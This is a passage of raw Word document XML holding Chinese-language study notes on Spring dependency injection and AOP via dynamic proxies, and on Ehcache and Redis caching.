          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>是对</w:t>
      </w:r>
      <w:r w:rsidRPr="009B68C0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>OO</w:t>
      </w:r>
      <w:r w:rsidRPr="009B68C0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>思想的一种补充</w:t>
      </w:r>
      <w:r w:rsidR="0065676F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0065676F" w:rsidRDefault="0065676F" w:rsidP="0065676F">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="316" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>spring</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>依赖注入：依赖注入其实就是控制反转，它分为构造方法注入，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>set</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>方法注入，接口注入，我们最常用的就是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>set</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>方法注入。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>举个例子说明一下，我们在用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>spring</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>时用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>xml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>配置的方式的话，都是将</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>bean</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>配置在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>spring</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>中，也有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>bean</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>property</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>属性。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>spring</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>容器在初始化时就通过反射将容器中的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>bean</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>实例化，假如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>bean</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>配置中有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>property</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>属性，就会反射</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>property</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>属性注入到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>bean</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>中。这就是依赖注入。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0065676F" w:rsidRDefault="0065676F" w:rsidP="0065676F">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="316" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0065676F" w:rsidRDefault="0065676F" w:rsidP="0065676F">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="316" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>spring AOP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>AOP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>就是面向切面编程。它主要运用了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>jdk</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>动态代理中的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Proxy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>类和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>InvicationHandler</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>接口实现。举例简单来说假如想要在原来的目标类的前后要加入日志的功能，目标类一定要实现一个接口，如果没有实现接口，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>spring</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>就会用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>cglib</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>包实现</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>AOP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>。推荐的还是要实现一个接口。实现过程大概就是实现了一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>InvicationHandler</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>接口的方法，里边有一个属性是目标类，在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>invoke</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>方法中利用反射执行目标类的方法，并在其前后加入日志的方法。然后将目标类的类加载器，目标类实现的接口和实现了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>InvicationHandler</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>接口的方法传入到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Proxy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>newProxyInstance</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>方法中。这样就实现了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>AOP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>。这样的话我们就可以在不修改任何代码的情况下在任何目标类中都可以动态的加入记日志的功能。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0065676F" w:rsidRPr="0065676F" w:rsidRDefault="0065676F" w:rsidP="009B68C0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EF5991" w:rsidRPr="00F41A4C" w:rsidRDefault="00CD320E" w:rsidP="00EF5991">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="00AD43C0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00AD43C0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidR="00EF5991" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="004C2DFC" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>echache</w:t>
      </w:r>
      <w:r w:rsidR="00353141" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:r w:rsidR="004C2DFC" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>redis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E16F16" w:rsidRPr="00F41A4C" w:rsidRDefault="00E16F16" w:rsidP="00E16F16">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>6.9.2 echache</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E16F16" w:rsidRDefault="00E16F16" w:rsidP="00E04D65">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A52736" w:rsidRPr="00F41A4C" w:rsidRDefault="00345BDA" w:rsidP="00E04D65">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Echache</w:t>
      </w:r>
      <w:r w:rsidR="004B2388" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="004B2388" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Java </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>进程缓存框架、</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>hibernate</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>默认提供的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>CacheProvider</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00345BDA" w:rsidRPr="00F41A4C" w:rsidRDefault="00345BDA" w:rsidP="00C53B93">
      <w:pPr>
        <w:ind w:left="420" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>快速、轻量，第一个引入缓存持久化的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>缓存框架</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004027C9" w:rsidRPr="00F41A4C" w:rsidRDefault="004027C9" w:rsidP="00C53B93">
      <w:pPr>
        <w:ind w:left="420" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>数据更新比较少的表</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004027C9" w:rsidRPr="00F41A4C" w:rsidRDefault="004027C9" w:rsidP="00CA00BF">
      <w:pPr>
        <w:ind w:left="420" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>注解方式，更新策略，擦除缓存：</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>@CacheEvict(value={"product", "productCategory", "review", "consu</w:t>
      </w:r>
      <w:r w:rsidR="00E16F16">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>9.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>ltation"}, allEntries=true)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00353141" w:rsidRPr="00F41A4C" w:rsidRDefault="00E16F16" w:rsidP="00E16F16">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>6.9.2 redis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F223B0" w:rsidRDefault="00F223B0" w:rsidP="00F223B0">
      <w:pPr>
        <w:pStyle w:val="5"/>
      </w:pPr>
      <w:r>
        <w:t>R</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>edis</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类型</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00353141" w:rsidRPr="00F41A4C" w:rsidRDefault="00353141" w:rsidP="00CA0A46">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>列表</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>采用双向链表，向列表两端添加数据非常快</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>O(1)</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>，通过索引访问速度非常慢</w:t>
      </w:r>
